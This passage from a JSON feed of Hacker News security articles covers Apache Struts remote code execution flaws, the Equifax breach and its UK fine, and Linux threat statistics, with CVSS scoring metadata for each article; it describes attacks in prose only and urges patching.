a wildcard namespace.\nAccording to the researcher, even if an application is currently not vulnerable, \"an inadvertent change to a Struts configuration file may render the application vulnerable in the future.\" \n \n\n\n## Here's Why You Should Take Apache Struts Exploit Seriously\n\n \nLess than a year ago, credit rating agency Equifax exposed [personal details of its 147 million consumers](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) due to their failure of patching a similar [Apache Struts flaw](<https://thehackernews.com/2017/03/apache-struts-framework.html>) that was disclosed earlier that year (CVE-2017-5638). \n \nThe Equifax breach cost the company over $600 million in losses. \n\n\n> \"Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\" said Pavel Avgustinov, Co-founder & VP of QL Engineering at Semmle.\n\n> \"A hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system.\"\n\n \n\n\n## Patch Released for Critical Apache Struts Bug\n\n[![apache struts vulnerability exploit](https://thehackernews.com/images/-aZ6JnELsib4/W31pGhAz6bI/AAAAAAAAx8M/0d3umSPy5YATSc8sNXCx5cKejhIftncEgCLcBGAs/s728-e100/apache-struts-vulnerability-exploit.png)](<https://thehackernews.com/images/-aZ6JnELsib4/W31pGhAz6bI/AAAAAAAAx8M/0d3umSPy5YATSc8sNXCx5cKejhIftncEgCLcBGAs/s728-e100/apache-struts-vulnerability-exploit.png>)\n\nApache Struts has fixed the vulnerability with the release of Struts versions 2.3.35 and 2.5.17. Organizations and developers who use Apache Struts are urgently advised to upgrade their Struts components as soon as possible. \n \nWe have seen how previous disclosures of similar critical flaws in Apache Struts have resulted in [PoC exploits](<https://thehackernews.com/2017/03/apache-struts-framework.html>) being published within a day, and exploitation of the [vulnerability in the wild](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>), putting critical infrastructure as well as customers' data at risk. \n \nTherefore, users and administrators are strongly advised to upgrade their Apache Struts components to the latest versions, even if they believe their configuration is not vulnerable right now. \n \nThis is not the first time the Semmle Security Research Team has reported a critical RCE flaw in Apache Struts. Less than a year ago, the team disclosed a similar [remote code execution vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) (CVE-2017-9805) in Apache Struts. \n \n\n\n## UPDATE \u2014 Apache Struts RCE Exploit PoC Released\n\n[![apache struts exploit poc rce vulnerability](https://thehackernews.com/images/-fNjQzu1b7iw/W376YS-nYjI/AAAAAAAAx9I/T7MopN2IxtwTxicu4k8j55ywy0GbIRQHgCLcBGAs/s728-e100/apache-struts-exploit-poc-rce-vulnerability.png)](<https://thehackernews.com/images/-fNjQzu1b7iw/W376YS-nYjI/AAAAAAAAx9I/T7MopN2IxtwTxicu4k8j55ywy0GbIRQHgCLcBGAs/s728-e100/apache-struts-exploit-poc-rce-vulnerability.png>)\n\nA security researcher has today released [a PoC exploit](<https://github.com/jas502n/St2-057/blob/master/README.md>) for the newly discovered remote code execution (RCE) vulnerability (CVE-2018-11776) in Apache Struts web application framework.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-08-22T14:04:00", "type": "thn", "title": "New Apache Struts RCE Flaw Lets Hackers Take Over Web Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805", "CVE-2018-11776"], "modified": "2018-08-23T18:30:56", "id": "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "href": "https://thehackernews.com/2018/08/apache-struts-vulnerability.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:51", "description": "[![consumer credit reporting Equifax data breach](https://thehackernews.com/images/-1V4miBZKvxA/W6OU7pQw5sI/AAAAAAAAyLM/GdXx9FNEs_UiDXCnBFucDDfdR_AGIzUkwCLcBGAs/s728-e100/equifax-data-breach.jpg)](<https://thehackernews.com/images/-1V4miBZKvxA/W6OU7pQw5sI/AAAAAAAAyLM/GdXx9FNEs_UiDXCnBFucDDfdR_AGIzUkwCLcBGAs/s728-e100/equifax-data-breach.jpg>)\n\nAtlanta-based consumer credit reporting agency Equifax has been issued a \u00a3500,000 fine by the UK's privacy watchdog for its last year's [massive data breach](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) that exposed personal and financial data of hundreds of millions of its customers. \n \nYes, \u00a3500,000\u2014that's the maximum fine allowed by the UK's Data Protection Act 1998, though the penalty is apparently a small figure for a $16 billion company. \n \nIn July this year, the UK's data protection watchdog issued the maximum allowed fine of [\u00a3500,000 on Facebook](<https://thehackernews.com/2018/07/facebook-cambridge-analytica.html>) over the [Cambridge Analytica scandal](<https://thehackernews.com/2018/03/facebook-cambridge-analytica.html>), saying the social media giant Facebook failed to prevent its citizens' data from falling into the wrong hands. \n \n\n\n## Flashback: The Equifax Data Breach 2017\n\n \nEquifax suffered a massive data breach last year between mid-May and the end of July, exposing highly [sensitive data of as many as 145 million people](<https://thehackernews.com/2017/10/equifax-credit-security-breach.html>) globally. \n \nThe stolen information included victims' names, dates of birth, phone numbers, driver's license details, addresses, and social security numbers, along with credit card information and personally identifying information (PII) for hundreds of thousands of its consumers. \n \nThe data breach occurred because the company failed to patch a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) on time, for which patches were already issued by the respected companies. \n \n\n\n## Why U.K. Has Fined a US Company?\n\n \nThe UK's Information Commissioner's Office (ICO), who launched a joint investigation into the breach with the Financial Conduct Authority, has now [issued](<https://ico.org.uk/about-the-ico/news-and-events/news-and-blogs/2018/09/credit-reference-agency-equifax-fined-for-security-breach/>) its largest possible monetary penalty under the country's Data Protection Act for the massive data breach\u2014\u00a3500,000, which equals to around $665,000. \n \nThe ICO said that although the [cyber attack compromised Equifax](<https://thehackernews.com/2017/09/equifax-data-breach.html>) systems in the United States, the company \"failed to take appropriate steps\" to protect the personal information of its 15 million UK customers. \n \nThe ICO investigation revealed \"multiple failures\" at the company like keeping users' personal information longer than necessary, which resulted in: \n\n\n * 19,993 UK customers had their names, dates of birth, telephone numbers and driving license numbers exposed.\n * 637,430 UK customers had their names, dates of birth and telephone numbers exposed.\n * Up to 15 million UK customers had names and dates of birth exposed.\n * Some 27,000 Britishers also had their Equifax account email addresses swiped.\n * 15,000 UK customers also had their names, dates of birth, addresses, account usernames and plaintext passwords, account recovery secret questions, and answers, obscured credit card numbers, and spending amounts stolen by hackers.\n \n\n\n## Breach Was Result of Multiple Failures at Equifax\n\n \nThe ICO said that Equifax had also been warned about a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/03/apache-struts-framework.html>) in its systems by the United States Department of Homeland Security (DHS) in March 2017, but the company did not take appropriate steps to fix the issue. \n \nInitially, it was also reported that the company kept news of the [breach hidden for a month](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) after its internal discovery, giving three senior executives at Equifax time to sell almost $2 million worth of its shares, though the company denied such claims. \n \nSince the data breach happened before the EU's General Data Protection Regulation (GDPR) took effect in May 2018, the maximum fine of \u00a3500,000 imposed under the UK's old Data Protection Act 1998 is still lesser. \n \nThe penalty could have been much larger had it fallen under GDPR, wherein a company could face a [maximum fine of 20 million euros](<https://thehackernews.com/2017/08/data-breach-security-law.html>) or 4 percent of its annual global revenue, whichever is higher, for such a privacy breach. \n \nIn response to the ICO's penalty, Equifax said that the company has fully cooperated with the ICO throughout the investigation that it is \"disappointed in the findings and the penalty.\" \n \nEquifax received the Monetary Penalty Notice from the ICO on Wednesday and can appeal the penalty.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-09-20T13:54:00", "type": "thn", "title": "UK Regulator Fines Equifax \u00a3500,000 Over 2017 Data Breach", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-09-20T13:54:52", "id": "THN:AF93AEDBDE6169AD1163D53979A4EA04", "href": "https://thehackernews.com/2018/09/equifax-credit-reporting-breach.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:16", "description": "[![New Apache Struts Zero-Day Vulnerability Being Exploited in the Wild](https://4.bp.blogspot.com/-YbGPFiDfo54/WMFEMrkhUUI/AAAAAAAArt0/axO9fhieprw6xBp0DoBNdECPB4t_le8uwCLcB/s1600/apache-struts-framework.png)](<https://4.bp.blogspot.com/-YbGPFiDfo54/WMFEMrkhUUI/AAAAAAAArt0/axO9fhieprw6xBp0DoBNdECPB4t_le8uwCLcB/s1600/apache-struts-framework.png>)\n\nSecurity researchers have discovered a Zero-Day vulnerability in the popular Apache Struts web application framework, which is being actively exploited in the wild. \n \nApache Struts is a free, open-source, Model-View-Controller (MVC) framework for creating elegant, modern Java web applications, which supports REST, AJAX, and JSON. \n \nIn a [blog post](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) published Monday, Cisco's Threat intelligence firm Talos announced the team observed a number of active attacks against the zero-day vulnerability (CVE-2017-5638) in Apache Struts. \n \nAccording to the researchers, the issue is a remote code execution vulnerability in the Jakarta Multipart parser of Apache Struts that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n\n\n> \"It is possible to perform an RCE attack with a malicious Content-Type value,\" [warned](<https://cwiki.apache.org/confluence/display/WW/S2-045>) Apache. \"If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.\"\n\nThe vulnerability, documented at Rapid7's Metasploit Framework [GitHub site](<https://github.com/rapid7/metasploit-framework/issues/8064>), has been patched by Apache. So, if you are using the Jakarta-based file upload Multipart parser under Apache Struts 2, you are advised to upgrade to Apache Struts version 2.3.32 or 2.5.10.1 immediately. \n \n\n\n### Exploit Code Publicly Released\n\n \nSince the Talos researchers detected public proof-of-concept (PoC) exploit code (which was uploaded to a Chinese site), the vulnerability is quite dangerous. \n \nThe researchers even detected \"a high number of exploitation events,\" the majority of which seem to be leveraging the publicly released PoC that is being used to run various malicious commands. \n\n\n[![apache-exploit-code](https://2.bp.blogspot.com/-OMaYI0kDfZk/WME-W6XvmwI/AAAAAAAArtc/4rw52IxHjJYLJOlufdQEoxxQwjYWAbGmQCLcB/s1600/apache-exploit-code.png)](<https://2.bp.blogspot.com/-OMaYI0kDfZk/WME-W6XvmwI/AAAAAAAArtc/4rw52IxHjJYLJOlufdQEoxxQwjYWAbGmQCLcB/s1600/apache-exploit-code.png>)\n\nIn some cases, the attackers executed simple \"whoami\" commands to see if the target system is vulnerable, while in others, the malicious attacks turned off firewall processes on the target and dropped payloads. \n\n\n[![apache-exploit](https://2.bp.blogspot.com/-1fS7Z-ZsPgA/WME-E_vWvTI/AAAAAAAArtY/k_8FmAtSwaU9ICPEjN1gQMTdPHsQSRyFACLcB/s1600/apache-exploit.png)](<https://2.bp.blogspot.com/-1fS7Z-ZsPgA/WME-E_vWvTI/AAAAAAAArtY/k_8FmAtSwaU9ICPEjN1gQMTdPHsQSRyFACLcB/s1600/apache-exploit.png>)\n\n \n\n\n> \"Final steps include downloading a malicious payload from a web server and execution of said payload,\" the researchers say. \"The payloads have varied but include an IRC bouncer, a DoS bot, and a sample related to the Bill Gates botnet... A payload is downloaded and executed from a privileged account.\"\n\nAttackers also attempted to gain persistence on infected hosts by adding a binary to the boot-up routine. \n \nAccording to the researchers, the attackers tried to copy the file to a benign directory and ensure_ \"that both the executable runs and that the firewall service will be disabled when the system boots.\"_ \n \nBoth Cisco and Apache researchers urge administrators to upgrade their systems to Apache Struts version 2.3.32 or 2.5.10.1 as soon as possible. Admins can also switch to a different [implementation](<https://cwiki.apache.org/confluence/display/WW/File+Upload#FileUpload-AlternateLibraries>) of the Multipart parser.\n", "cvss3": {}, "published": "2017-03-09T01:03:00", "type": "thn", "title": "New Apache Struts Zero-Day Vulnerability Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T12:03:10", "id": "THN:2707247140A4F620671B33D68FEB1EA9", "href": "https://thehackernews.com/2017/03/apache-struts-framework.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:06:56", "description": "[![apache-struts-vulnerability](https://3.bp.blogspot.com/-FaVOI33zhVo/Wa7tX3RO_oI/AAAAAAAAuSA/pvKz2qxYH9weyv9C_HBcEOR5P901cjkngCLcBGAs/s1600/apache-struts-vulnerability.png)](<https://3.bp.blogspot.com/-FaVOI33zhVo/Wa7tX3RO_oI/AAAAAAAAuSA/pvKz2qxYH9weyv9C_HBcEOR5P901cjkngCLcBGAs/s1600/apache-struts-vulnerability.png>)\n\nSecurity researchers have [discovered](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) a critical remote code execution vulnerability in the popular Apache Struts web application framework, allowing a remote attacker to run malicious code on the affected servers. \n \nApache Struts is a free, open-source, Model-View-Controller (MVC) framework for developing web applications in the Java programming language, which supports REST, AJAX, and JSON. \n \nThe vulnerability (CVE-2017-9805) is a programming blunder that resides in the way Struts processes data from an untrusted source. Specifically, Struts REST plugin fails to handle XML payloads while deserializing them properly. \n \nAll versions of Apache Struts since 2008 (Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12) are affected, leaving all web applications using the framework\u2019s REST plugin vulnerable to remote attackers. \n \nAccording to one of the security researchers at LGTM, who [discovered](<https://lgtm.com/blog/apache_struts_CVE-2017-9805>) this flaw, the Struts framework is being used by \"an incredibly large number and variety of organisations,\" including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. \n \n\"On top of that, [the vulnerability] is incredibly easy for an attacker to exploit this weakness: all you need is a web browser,\" Man Yue Mo, an LGTM security researcher said. \n \nAll an attacker needs is to submit a malicious XML code in a particular format to trigger the vulnerability on the targeted server. \n \nSuccessful exploitation of the vulnerability could allow an attacker to take full control of the affected server, eventually letting the attacker infiltrate into other systems on the same network. \n \nMo said this flaw is an unsafe deserialization in Java similar to a vulnerability in Apache Commons Collections, [discovered](<https://frohoff.github.io/appseccali-marshalling-pickles/>) by Chris Frohoff and Gabriel Lawrence in 2015 that also allowed arbitrary code execution. \n \nMany Java applications have since been affected by multiple similar vulnerabilities in recent years. \n \nSince this vulnerability has been patched in [Struts version 2.5.13](<https://struts.apache.org/docs/s2-052.html>), administrators are strongly advised to upgrade their Apache Struts installation as soon as possible. \n \nMore technical details about the vulnerability and proof-of-concept have not been published by the researchers yet, giving admins enough time to upgrade their systems.\n", "cvss3": {}, "published": "2017-09-05T07:40:00", "type": "thn", "title": "Critical Flaw in Apache Struts2 Lets Hackers Take Over Web Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-9805"], "modified": "2017-09-06T10:53:09", "id": "THN:460709FF530ED7F35B5817A55F1BF2C6", "href": "https://thehackernews.com/2017/09/apache-struts-vulnerability.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-27T10:06:55", "description": "[![apache-struts-flaws-cisco](https://3.bp.blogspot.com/-_apYSKyOUKo/Wbe7DDGoMfI/AAAAAAAAC0o/yPE-wNpS2n83-GU6fD28_WevBKtwhDX1gCLcBGAs/s1600/apache-struts-cisco.jpg)](<https://3.bp.blogspot.com/-_apYSKyOUKo/Wbe7DDGoMfI/AAAAAAAAC0o/yPE-wNpS2n83-GU6fD28_WevBKtwhDX1gCLcBGAs/s1600/apache-struts-cisco.jpg>)\n\nAfter [Equifax massive data breach](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) that was believed to be caused due to [a vulnerability in Apache Struts](<https://thehackernews.com/2017/03/apache-struts-framework.html>), Cisco has initiated an investigation into its products that incorporate a version of the popular Apache Struts2 web application framework. \n \nApache Struts is a free, open-source MVC framework for developing web applications in the Java programming language, and used by 65 percent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. \n \nHowever, the popular open-source software package was recently found affected by multiple vulnerabilities, including two remote code execution vulnerabilities\u2014one discovered earlier this month, and another in March\u2014one of which is [believed to be used](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) to breach personal data of over [143 million Equifax users](<https://thehackernews.com/2017/09/equifax-data-breach.html>). \n \nSome of Cisco products including its Digital Media Manager, MXE 3500 Series Media Experience Engines, Network Performance Analysis, Hosted Collaboration Solution for Contact Center, and Unified Contact Center Enterprise have been found vulnerable to multiple Apache Struts flaws. \n \n\n\n### Cisco Launches Apache Struts Vulnerability Hunting\n\n \nCisco is also testing rest of its products against four newly discovered security vulnerability in Apache Struts2, including the one (CVE-2017-9805) [we reported on September 5](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) and the remaining three also disclosed last week. \n \nHowever, the remote code execution bug (CVE-2017-5638) that was [actively exploited back in March](<https://thehackernews.com/2017/03/apache-struts-framework.html>) this year is not included by the company in its recent security audit. \n \nThe three vulnerabilities\u2014CVE-2017-9793, CVE-2017-9804 and CVE-2017-9805\u2014included in the [Cisco security audit](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170907-struts2>) was released by the Apache Software Foundation on 5th September with the release of Apache Struts 2.5.13 which patched the issues. \n \nThe fourth vulnerability (CVE-2017-12611) that is being [investigated by Cisco](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170909-struts2-rce>) was released on 7th September with the release of Apache Struts 2.3.34 that fixed the flaw that resided in the Freemarker tag functionality of the Apache Struts2 package and could allow an unauthenticated, remote attacker to execute malicious code on an affected system. \n \n\n\n### Apache Struts Flaw Actively Exploited to Hack Servers & Deliver Malware\n\n \nComing on to the most severe of all, CVE-2017-9805 (assigned as critical) is a programming bug that manifests due to the way Struts REST plugin handles XML payloads while deserializing them. \n \nThis could allow a remote, unauthenticated attacker to achieve remote code execution on a host running a vulnerable version of Apache Struts2, and Cisco's Threat intelligence firm Talos has [observed](<http://blog.talosintelligence.com/2017/09/apache-struts-being-exploited.html>) that this flaw is [under active exploitation](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) to find vulnerable servers. \n \nSecurity researchers from data centre security vendor Imperva recently [detected](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) and blocked thousands of attacks attempting to exploit this Apache Struts2 vulnerability (CVE-2017-9805), with roughly 80 percent of them tried to deliver a malicious payload. \n \nThe majority of attacks originated from China with a single Chinese IP address registered to a Chinese e-commerce company sending out more than 40% of all the requests. Attacks also came from Australia, the U.S., Brazil, Canada, Russia and various parts of Europe. \n \nOut of the two remaining flaws, one (CVE-2017-9793) is again a vulnerability in the REST plug-in for Apache Struts that manifests due to \"insufficient validation of user-supplied input by the XStream library in the REST plug-in for the affected application.\" \n \nThis flaw has been given a Medium severity and could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on targeted systems. \n \nThe last flaw (CVE-2017-9804) also allows an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected system but resides in the URLValidator feature of Apache Struts. \n \nCisco is testing its products against these vulnerabilities including its WebEx Meetings Server, the Data Center Network Manager, Identity Services Engine (ISE), MXE 3500 Series Media Experience Engines, several Cisco Prime products, some products for voice and unified communications, as well as video and streaming services. \n \nAt the current, there are no software patches to address the vulnerabilities in Cisco products, but the company promised to release updates for affected software which will soon be accessible through the [Cisco Bug Search Tool](<https://bst.cloudapps.cisco.com/bugsearch/bug/BUGID>). \n \nSince the framework is being widely used by a majority of top 100 fortune companies, they should also check their infrastructures against these vulnerabilities that incorporate a version of Apache Struts2.\n", "cvss3": {}, "published": "2017-09-11T23:50:00", "type": "thn", "title": "Apache Struts 2 Flaws Affect Multiple Cisco Products", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-9804", "CVE-2017-5638", "CVE-2017-9793", "CVE-2017-9805", "CVE-2017-12611"], "modified": "2017-09-12T10:51:16", "id": "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "href": "https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:53", "description": "[![equifax-credit-security-breach](https://4.bp.blogspot.com/-7t3BApLnYmI/WdM9FFq_vsI/AAAAAAAAATQ/KVrOmkm6SzoTm_8rLuSGnUbnhJudoRXwwCLcBGAs/s1600/equifax-data-breach.png)](<https://4.bp.blogspot.com/-7t3BApLnYmI/WdM9FFq_vsI/AAAAAAAAATQ/KVrOmkm6SzoTm_8rLuSGnUbnhJudoRXwwCLcBGAs/s1600/equifax-data-breach.png>)\n\n[Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) was bigger than initially reported, exposing highly sensitive information of more Americans than previously revealed. \n \nCredit rating agency Equifax says an additional 2.5 million U.S. consumers were also impacted by the massive data breach the company disclosed last month, bringing the total possible victims to 145.5 million from 143 million. \n \nEquifax last month announced that it had suffered a massive data breach that exposed highly sensitive data of hundreds of millions of its customers, which includes names, social security numbers, dates of birth and addresses. \n \nIn addition, credit card information for [nearly 209,000 customers](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) was also stolen, as well as certain documents with personally identifying information (PII) for approximately 182,000 Equifax consumers. \n \nThe breach was due to a critical vulnerability ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) in Apache Struts 2 framework, which Apache patched over two months earlier (on March 6) of the security incident. \n \nEquifax was even [informed by the US-CERT](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) on March 8 to patch the flaw, but the company failed to identified or patched its systems against the issue, Equifax ex-CEO Richard Smith said in a statement [[PDF](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>)] to the House Committee on Energy and Commerce. \n\n\n> \"It appears that the breach occurred because of both human error and technology failures,\" Smith said. \"Equifax's information security department also ran scans that should have identified any systems that were vulnerable to the Apache Struts issue...Unfortunately, however, the scans did not identify the Apache Struts vulnerability.\"\n\nIn the wake of the security incident, the company hired FireEye-owned security firm Mandiant to investigate the breach, which has now concluded the forensic portion of its investigation and plans to release the results \"promptly.\" \n \nMandiant said a total of 145.5 million consumers might now potentially have been [impacted by the breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>), which is 2.5 million more than previously estimated. However, the firm did not identify any evidence of \"new attacker activity.\" \n\n\n> \"Mandiant did not identify any evidence of additional or new attacker activity or any access to new databases or tables,\" Equifax said in a Monday [press release](<https://investor.equifax.com/news-and-events/news/2017/10-02-2017-213238821>). \n\n> \"Instead, this additional population of consumers was confirmed during Mandiant's completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\"\n\nThe forensic investigation also found that approximately 8,000 Canadian consumers were also impacted, which is much lower than the 100,000 initially estimated figure by the credit rating and reporting firm. \n \nHowever, Equifax said that this figure \"was preliminary and did not materialize.\" \n \n\"I want to apologize again to all impacted consumers. As this important phase of our work is now completed, we continue to take numerous steps to review and enhance our cybersecurity practices,\" newly appointed interim CEO, Paulino do Rego Barros, Jr. said. \n \n\"We also continue to work closely with our internal team and outside advisors to implement and accelerate long-term security improvements.\" \n \nEquifax, which maintains data on over 820 million consumers and over 91 million businesses worldwide, also said the company would update its own notification by October 8 for its customers who want to check if they were among those affected by the data breach.\n", "cvss3": {}, "published": "2017-10-02T21:23:00", "type": "thn", "title": "Whoops, Turns Out 2.5 Million More Americans Were Affected By Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T08:23:36", "id": "THN:ACD3479531482E2CA5A8E15EB6B47523", "href": "https://thehackernews.com/2017/10/equifax-credit-security-breach.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:37:24", "description": "[![](https://thehackernews.com/images/-mNDlC0tKMKU/YSOiCQjKsfI/AAAAAAAADm0/8vxg1C4GweIrljnlPQrCj0yPLMYs18y_ACLcBGAsYHQ/s0/linux.jpg)](<https://thehackernews.com/images/-mNDlC0tKMKU/YSOiCQjKsfI/AAAAAAAADm0/8vxg1C4GweIrljnlPQrCj0yPLMYs18y_ACLcBGAsYHQ/s0/linux.jpg>)\n\nClose to 14 million Linux-based systems are directly exposed to the Internet, making them a lucrative target for an array of real-world attacks that could result in the deployment of malicious web shells, coin miners, ransomware, and other trojans.\n\nThat's according to an in-depth look at the Linux threat landscape published by U.S.-Japanese cybersecurity firm [Trend Micro](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/linux-threat-report-2021-1h-linux-threats-in-the-cloud-and-security-recommendations>), detailing the top threats and vulnerabilities affecting the operating system in the first half of 2021, based on data amassed from honeypots, sensors, and anonymized telemetry.\n\nThe company, which detected nearly 15 million malware events aimed at Linux-based cloud environments, found coin miners and ransomware to make up 54% of all malware, with web shells accounting for a 29% share.\n\nIn addition, by dissecting over 50 million events reported from 100,000 unique Linux hosts during the same time period, the researchers found 15 different security weaknesses that are known to be actively exploited in the wild or have a proof of concept (PoC) \u2014\n\n * [**CVE-2017-5638**](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>) (CVSS score: 10.0) - Apache Struts 2 remote code execution (RCE) vulnerability\n * [**CVE-2017-9805**](<https://nvd.nist.gov/vuln/detail/CVE-2017-9805>) (CVSS score: 8.1) - Apache Struts 2 REST plugin XStream RCE vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal Core RCE vulnerability\n * [**CVE-2020-14750**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14750>) (CVSS score: 9.8) - Oracle WebLogic Server RCE vulnerability\n * [**CVE-2020-25213**](<https://nvd.nist.gov/vuln/detail/CVE-2020-25213>) (CVSS score: 10.0) - WordPress File Manager (wp-file-manager) plugin RCE vulnerability\n * [**CVE-2020-17496**](<https://nvd.nist.gov/vuln/detail/CVE-2020-17496>) (CVSS score: 9.8) - vBulletin 'subwidgetConfig' unauthenticated RCE vulnerability\n * [**CVE-2020-11651**](<https://nvd.nist.gov/vuln/detail/CVE-2020-11651>) (CVSS score: 9.8) - SaltStack Salt authorization weakness vulnerability\n * [**CVE-2017-12611**](<https://nvd.nist.gov/vuln/detail/CVE-2017-12611>) (CVSS score: 9.8) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2017-7657**](<https://nvd.nist.gov/vuln/detail/CVE-2017-7657>) (CVSS score: 9.8) - Eclipse Jetty chunk length parsing integer overflow vulnerability\n * [**CVE-2021-29441**](<https://nvd.nist.gov/vuln/detail/CVE-2021-29441>) (CVSS score: 9.8) - Alibaba Nacos AuthFilter authentication bypass vulnerability\n * [**CVE-2020-14179**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14179>) (CVSS score: 5.3) - Atlassian Jira information disclosure vulnerability \n * [**CVE-2013-4547**](<https://nvd.nist.gov/vuln/detail/CVE-2013-4547>) (CVSS score: 8.0) - Nginx crafted URI string handling access restriction bypass vulnerability\n * [**CVE-2019-0230**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0230>) (CVSS score: 9.8) - Apache Struts 2 RCE vulnerability\n * [**CVE-2018-11776**](<https://nvd.nist.gov/vuln/detail/CVE-2018-11776>) (CVSS score: 8.1) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2020-7961**](<https://nvd.nist.gov/vuln/detail/CVE-2020-7961>) (CVSS score: 9.8) - Liferay Portal untrusted deserialization 